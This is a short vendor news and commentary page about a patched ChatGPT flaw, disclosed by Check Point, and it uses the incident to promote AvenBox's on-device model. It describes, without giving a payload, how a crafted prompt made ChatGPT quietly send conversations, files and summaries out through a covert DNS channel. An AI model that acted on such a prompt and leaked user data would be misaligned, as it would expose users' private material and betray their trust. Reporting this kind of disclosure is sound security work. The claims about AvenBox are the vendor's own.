Signal

ChatGPT data-exfiltration flaw patched — hidden DNS channel leaked full conversations

A single malicious prompt could silently forward ChatGPT chat content, uploaded files, and AI-generated summaries out through a covert DNS channel. Disclosed and patched February 2026. The incident is the argument for local-first: your data never leaves the boundary if there is no outbound channel to abuse.

Our take

Why this matters for local-first

A single crafted prompt was enough to turn ChatGPT's own runtime into an outbound exfiltration channel. Entire conversations, attached files, and AI-generated summaries could be silently routed out over DNS — a channel most enterprise filters don't even inspect.

Check Point disclosed the flaw and OpenAI patched it. That's the happy ending. The uncomfortable part is the class of failure: once your working data lives inside someone else's runtime, every new feature (code execution, tool calls, browsing) becomes a new potential leak path. Each one needs independent auditing. Each one is outside your control.

This is the argument for local-first, compressed into one incident. If the model and the data never leave the boundary you operate, there is no outbound channel to abuse. Not "a stronger filter" — no channel. You cannot exfiltrate what never had a route out.

AvenBox runs the model on device. No telemetry, no runtime sandbox you don't control, no hidden channels being shipped to you under the label of a feature.

Source

Read the original reporting

Check Point Research →

Continue

More signal

← Back to News